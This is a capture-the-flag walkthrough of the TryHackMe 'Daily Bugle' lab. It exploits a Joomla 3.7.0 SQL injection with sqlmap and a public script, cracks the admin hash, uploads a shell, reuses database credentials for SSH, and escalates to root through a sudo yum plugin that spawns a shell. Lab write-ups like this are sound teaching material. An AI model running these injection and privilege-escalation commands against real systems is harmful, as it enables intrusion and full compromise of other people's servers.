# Daily Bugle

###### tags: `vulnerableMachine` `linuxMachine`

[TOC]

## Recon

![](https://i.imgur.com/Kj1CXxq.png)

Open ports -> 22 (ssh), 80 (http)

OS: CentOS

![](https://i.imgur.com/cuZr1FC.png)

```
spider man
```

### Check favicon

![](https://i.imgur.com/BVJbJoG.png)

```
http://10.10.131.129/templates/protostar/favicon.ico
```

![](https://i.imgur.com/sr4iCZL.png)

```
d41d8cd98f00b204e9800998ecf8427e
```

![](https://i.imgur.com/Fw9RZUn.png)

```
d41d8cd98f00b204e9800998ecf8427e:Zero byte favico
```

The lookup matches a zero-byte favicon, so it does not reveal the framework.

### Walking

```
==> DIRECTORY: http://10.10.131.129:80/administrator/
==> DIRECTORY: http://10.10.131.129:80/bin/
==> DIRECTORY: http://10.10.131.129:80/cache/
==> DIRECTORY: http://10.10.131.129:80/components/
==> DIRECTORY: http://10.10.131.129:80/images/
==> DIRECTORY: http://10.10.131.129:80/includes/
==> DIRECTORY: http://10.10.131.129:80/language/
==> DIRECTORY: http://10.10.131.129:80/layouts/
==> DIRECTORY: http://10.10.131.129:80/libraries/
==> DIRECTORY: http://10.10.131.129:80/media/
==> DIRECTORY: http://10.10.131.129:80/modules/
==> DIRECTORY: http://10.10.131.129:80/plugins/
+ http://10.10.131.129:80/robots.txt (CODE:200|SIZE:836)
==> DIRECTORY: http://10.10.131.129:80/templates/
==> DIRECTORY: http://10.10.131.129:80/tmp/
```

http://10.10.131.129/administrator/ -> Joomla framework

### Using Joomla scanner

https://github.com/OWASP/joomscan

Joomla version -> 3.7.0

![](https://i.imgur.com/mv3XJQ4.png)

![](https://i.imgur.com/RywjXyK.png)

```
http://10.10.131.129/administrator/components
http://10.10.131.129/administrator/modules
http://10.10.131.129/administrator/templates
http://10.10.131.129/administrator/includes
http://10.10.131.129/administrator/language
http://10.10.131.129/administrator/templates
```

Exploit-DB

![](https://i.imgur.com/qXgTG6F.png)

![](https://i.imgur.com/a0BBEZ9.png)

```
POST /administrator/index.php HTTP/1.1
Host: 10.10.131.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://10.10.131.129
Connection: close
Referer: http://10.10.131.129/administrator/
Cookie: eaa83fe8b963ab08ce9ab7d4a798de05=e2lfgvsb92kc3k53278prs9uk2; 2b01af51830ca9615359108de04d9ca1=7jjmlk2dp3v3mpbi5df030giu0
Upgrade-Insecure-Requests: 1

username=meow&passwd=meow&option=com_login&task=login&return=aW5kZXgucGhw&81e1634de28518ec230400f408a45bd5=1
```

## Getting Initial Access

## Way 1: Using SQLmap

https://www.exploit-db.com/exploits/42033

SQL exploit command:

```
sqlmap -u "http://<remote-ip>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' --dump
```

It's not unstable

## Way 2: Python script

https://github.com/XiphosResearch/exploits/blob/master/Joomblah/joomblah.py

This script has a type error. Fix:

```
result += value -> result += value.decode('utf-8')
```

![](https://i.imgur.com/m3ISgF1.png)

```
Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
```

Username -> jonah

Password hash -> $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

### Check hash type

![](https://i.imgur.com/3S2d0NV.png)

Hash type -> bcrypt

```
password->spiderman123
```

Login success

![](https://i.imgur.com/BODLtw9.png)

Shell upload

![](https://i.imgur.com/ClKLKf7.png)

![](https://i.imgur.com/JYZDjnr.png)

## Privilege Elevation

apache user -> home user

![](https://i.imgur.com/Zlb90Xj.png)

```
jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash
```

-> jjameson user

We can look at the web configuration file. It always has some credentials for logging in to the database, haha.

```
# as the apache user
cd /var/www/html
cat configuration.php
```

```
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $mailfrom = 'jonah@tryhackme.com';
public $fromname = 'The Daily Bugle';
public $sendmail = '/usr/sbin/sendmail';
```

Try logging in over ssh:

User -> jjameson

Password -> nv5uz9r3ZEDzVjNu

![](https://i.imgur.com/kQEMFFN.png)

Login success

Sudo privilege: yum

```
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y
```

`TF=$(mktemp -d)` -> creates a temporary directory and stores its path in the variable `TF`.

Overall, the script uses the plugin feature of the yum package manager: it installs a yum plugin on the system, and the plugin launches a shell when it is started. Because yum runs under sudo here, that shell runs as root.

![](https://i.imgur.com/H4yxnBQ.png)